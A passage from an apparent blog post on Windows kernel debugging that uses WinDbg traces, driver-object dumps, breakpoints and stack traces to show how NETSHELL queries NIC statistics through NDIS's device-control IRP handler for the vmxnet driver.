font-family: "Courier New",Courier,monospace;">NDIS!ndisQueryStatisticsOids 71 1 660 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisReferencePackage 8 10 10 10</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisValidOid 9 3 190 131</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KeAcquireInStackQueuedSpinLockRaiseToSynch 1 6 6 6</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KeRaiseIrqlToDpcLevel 35 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KfAcquireSpinLock 8 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KfRaiseIrql 9 7 7 7</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!READ_PORT_ULONG 1 3 3 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExAcquireResourceExclusiveLite 8 23 23 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExAllocatePoolWithQuotaTag 1 59 59 59</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExAllocatePoolWithTag 3 73 173 106</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExFreePoolWithTag 2 82 130 106</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExInsertTailNBQueue1 70 70 70</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExInterlockedAddLargeStatistic 1 3 3 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExInterlockedPopEntrySList 6 3 3 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExMapHandleToPointerEx 1 36 36 36</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExReleaseResourceLite 8 31 31 31</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExRemoveHeadNBQueue1 56 56 56</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExUnlockHandleTableEntry 1 22 22 22</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExfInterlockedCompareExchange64 3 12 12 12</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpInterlockedPopEntrySListEnd 6 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpInterlockedPopEntrySListFault 6 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpInterlockedPopEntrySListResume 6 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpLookupHandleTableEntry 1 29 29 29</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!InterlockedPushEntrySList 2 13 13 13</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IoAllocateIrp 1 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IoAllocateMdl 1 55 55 55</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IoGetRelatedDeviceObject 1 23 23 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IofCallDriver 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IofCompleteRequest 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopAllocateIrpPrivate 1 208 208 208</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopGetMountFlag 1 11 11 11</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopSynchronousServiceTail 1 57 57 57</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopUpdateOtherOperationCount 1 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopXxxControlFile 1 235 235 235</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopfCallDriver 1 16 16 16</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopfCompleteRequest1 106 106 106</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeInitializeApc 1 26 26 26</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeInitializeEvent 8 14 14 14</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeInsertQueueApc 1 31 31 31</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeQueryTimeIncrement 1 2 2 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeSetEvent 8 27 27 27</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeWaitForSingleObject 8 66 66 66</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KefAcquireSpinLockAtDpcLevel 8 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KefReleaseSpinLockFromDpcLevel 8 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KiAdjustQuantumThread 8 18 42 27</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KiFindReadyThread 3 43 49 47</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KiInsertQueueApc 1 51 51 51</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MiLockCode 8 496 496 496</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MiReleaseSystemPtes1 57 57 57</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MiReserveSystemPtes1 44 44 44</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmLockPagableSectionByHandle 8 73 73 73</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmMapLockedPagesSpecifyCache 1 123 123 123</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmProbeAndLockPages1 200 200 200</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmUnlockPagableImageSection 8 368 368 368</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmUnlockPages 1 88 88 88</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmUnmapLockedPages 1 34 34 34</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ObReferenceObjectByHandle 1 83 83 83</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ObfDereferenceObject 1 26 26 26</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ObfReferenceObject 2 14 14 14</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!PsChargeProcessPoolQuota 1 63 63 63</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!PsGetCurrentThread24 2 2 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!RtlFillMemoryUlonglong 1 15 15 15</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_SEH_epilog 3 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_SEH_prolog 3 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_alldiv 1 27 27 27</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_allmul 1 8 8 8</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!memcpy 8 30 32 31</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!memmove 15 32 34 32</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">vmxnet 584 1 2 1 </span></span></blockquote></blockquote><ol start="2"><li>NdisDeviceControlIrpHandler</li>
<ul><li>We got 3 informations here:</li>
<ol type="i"><li>NIC driver name > <b>vmxnet</b></li>
<li><b>NDIS!ndisQueryStatisticsOids</b> is used to query the NIC stat info</li>
<li><b>NDIS!ndisDeviceControlIrpHandler</b> is a dispatch handler for <b>IRP_MJ_DEVICE_CONTROL</b> major function that is reponsible to handle <b>DeviceIoControl</b> called from user mode</li>
<ul><li>The <b>ndisDeviceControlIrpHandler</b> is registered by ndis.sys by one of the exported function <b>NdisMRegisterMiniport </b> </li>
</ul></ol></ul></ol><div style="text-align: center;"><span style="color: #e06666;">export function <b>NdisMRegisterMiniport </b></span>-> <b><span style="color: #e06666;">NdisRegisterMiniportDriver</span> </b>-> <span style="color: #e06666;">Dispatch routine <b>NdisDeviceControlIrpHandler </b></span>-> <b><span style="color: #e06666;">NdisQueryStatisticsOids </span></b><span style="color: lime;">// Its called <b>NdisDeviceControlIrpHandler</b> in Windows XP ndis.sys </span></div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><u>Diagram Illustration of how NdisDeviceControlIrpHandler is called</u></div><ul><ul><li>To verify that:<u></u></li>
</ul></ul><blockquote><blockquote><i>Case (i):</i> <br />
<br />
<div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> !drvobj \driver\vmxnet 7</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Driver object (81862f38) is for:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">*** ERROR: Module load completed but symbols could not be loaded for vmxnet.sys</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">\Driver\vmxnet</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Driver Extension List: (id , addr)</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">(4e4d4944 8197a600) </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Device Object list:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">818627e0 </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br />
</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">DriverEntry: f9cc2685 vmxnet</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">DriverStartIo: 00000000 </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">DriverUnload: f96cb89b NDIS!ndisMUnload</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">AddDevice: f96c75b4 NDIS!ndisPnPAddDevice</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br />
</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Dispatch routines:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[00] IRP_MJ_CREATE f96bae6b NDIS!ndisCreateIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[01] IRP_MJ_CREATE_NAMED_PIPE f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[02] IRP_MJ_CLOSE f96bad9c NDIS!ndisCloseIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[03] IRP_MJ_READ f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[04] IRP_MJ_WRITE f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[05] IRP_MJ_QUERY_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[06] IRP_MJ_SET_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[07] IRP_MJ_QUERY_EA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[08] IRP_MJ_SET_EA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[09] IRP_MJ_FLUSH_BUFFERS f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0a] IRP_MJ_QUERY_VOLUME_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0b] IRP_MJ_SET_VOLUME_INFORMATION f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0c] IRP_MJ_DIRECTORY_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0d] IRP_MJ_FILE_SYSTEM_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>[0e] IRP_MJ_DEVICE_CONTROL f96c1010 NDIS!ndisDeviceControlIrpHandler</b></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[10] IRP_MJ_SHUTDOWN f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[11] IRP_MJ_LOCK_CONTROL f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[12] IRP_MJ_CLEANUP f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[13] IRP_MJ_CREATE_MAILSLOT f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[14] IRP_MJ_QUERY_SECURITY f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[15] IRP_MJ_SET_SECURITY f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[16] IRP_MJ_POWER f96ce877 NDIS!ndisPowerDispatch</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[17] IRP_MJ_SYSTEM_CONTROL f96c1415 NDIS!ndisWMIDispatch</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[18] IRP_MJ_DEVICE_CHANGE f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[19] IRP_MJ_QUERY_QUOTA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[1a] IRP_MJ_SET_QUOTA f96c11f4 NDIS!ndisDummyIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[1b] IRP_MJ_PNP f96c3ab9 NDIS!ndisPnPDispatch</span></div><br />
<br />
<i>Case (ii)&(iii)</i>:<br />
<br />
<div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> bp NDIS!ndisDeviceControlIrpHandler ".echo ====NdisDeviceControlIrpHandler breakpoint hit====\n;.echo IoControlCode>\n;dd poi(poi(esp+8)+60)+c l1\n;.echo OutputBufferLength>\n;dd poi(poi(esp+8)+60)+4 l1\n;.echo OutputBuffer>\n;dd poi(poi(poi(esp+8)+4)+10)+86c l3d\n;.echo InputBufferLength>\n;dd poi(poi(esp+8)+60)+8 l1\n;.echo InputBuffer>\n;dd poi(poi(esp+8)+c)\n;"</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> g</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Breakpoint 3 hit</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">====NdisDeviceControlIrpHandler breakpoint hit====</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">IoControlCode></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">8155a2f8 0017003e</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">OutputBufferLength:></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">8155a2f0 000002d0</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">OutputBuffer:></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f86c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f87c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f88c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f89c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8ac 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8bc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8cc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8dc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8ec 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f8fc 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f90c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f91c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f92c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f93c 00000000 00000000 00000000 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f94c 00000000 00000000 00000002 00000002</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f95c 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">InputBufferLength:></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">8155a2f4 0000003c</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">InputBuffer:></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977300 00010107 80010104 80010114 00020101</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977310 00020102 00020103 00020104 80020208</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977320 80020201 80020207 80ffffff 80020213 </b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977330 80020214 80020215 80010202 f763b6a4</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977340 00060009 20646156 8168e170 8173ce20</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977350 00000000 00000000 816c8af8 07100002</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977360 817a12d0 e1be6290 fffffffc 40000000</b></span></div><div style="color: lime; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><b>81977370 0a050006 6e66744e 001c0707 00000000</b></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">NDIS!ndisDeviceControlIrpHandler:</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f96c1010 8bff mov edi,edi</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> kb</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">ChildEBP RetAddr Args to Child </span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f763bc34 804edfe3 818627e0 8155a258 806d02d0 NDIS!ndisDeviceControlIrpHandler</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f763bc44 80573dce 8155a2ec 81731dd8 8155a258 nt!IopfCallDriver+0x31</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f763bc58 80574c5d 818627e0 8155a258 81731dd8 nt!IopSynchronousServiceTail+0x60</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f763bd00 8056d5ba 000001fc 00000000 00000000 nt!IopXxxControlFile+0x5e7</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f763bd34 8053ca28 000001fc 00000000 00000000 nt!NtDeviceIoControlFile+0x2a</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">f763bd34 7c90eb94 000001fc 00000000 00000000 nt!KiFastCallEntry+0xf8</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f7b8 7c90d8ef 7c801671 000001fc 00000000 ntdll!KiFastSystemCallRet</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f7bc 7c801671 000001fc 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0f81c 76468375 000001fc 0017003e 76477d3c kernel32!DeviceIoControl+0xdd</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fb40 7645f5c7 000f6d94 01a0fb5c 01a0fc08 NETSHELL!NdisQueryStatistics+0x88</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fbc8 76460d32 01a0fbe4 01a0fc08 001622a0 NETSHELL!CLanStatEngine::HrUpdateData+0x37</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fbec 7645d7a4 000f6d00 01a0fc08 01a0fc8c NETSHELL!CNetStatisticsEngine::UpdateStatistics+0x2d</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fc10 7645e7eb 00165dd4 7645e7b5 00134bf8 NETSHELL!CNetStatisticsCentral::RefreshStatistics+0x4e</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fc24 7e418734 00000000 00000113 00007ff4 NETSHELL!CNetStatisticsCentral::TimerCallback+0x36</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fc50 7e419857 7645e7b5 00000000 00000113 USER32!InternalCallWinProc+0x28</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fcb8 7e419791 00000000 7645e7b5 00000000 USER32!UserCallWinProc+0xf3</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fd10 7e418a10 01a0fd68 00000000 01a0fd8c USER32!DispatchMessageWorker+0x10e</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fd20 7628155a 01a0fd68 00000000 76280000 USER32!DispatchMessageW+0xf</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0fd8c 76283746 76280000 00000000 000100c8 stobject!SysTrayMain+0x177</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">01a0ffb4 7c80b683 00000000 00000000 00000000 stobject!CSysTray::SysTrayThreadProc+0x4f</span></div></blockquote></blockquote><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmFsTswic8tE4RMOP-WlHH8bzwINhbNH8vGVV9dnkOUB63hdKYXbEeIa8h9qDK0md0ypN292-yfDs4F5oAlmLX0otdXW2FGS1nqElfRJn04lxAggghlkQK87Nw1pFwhNA20Rl4KXwUSeZ/s1600/diagram_explorer_retrieve_network_stats_from_nic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" 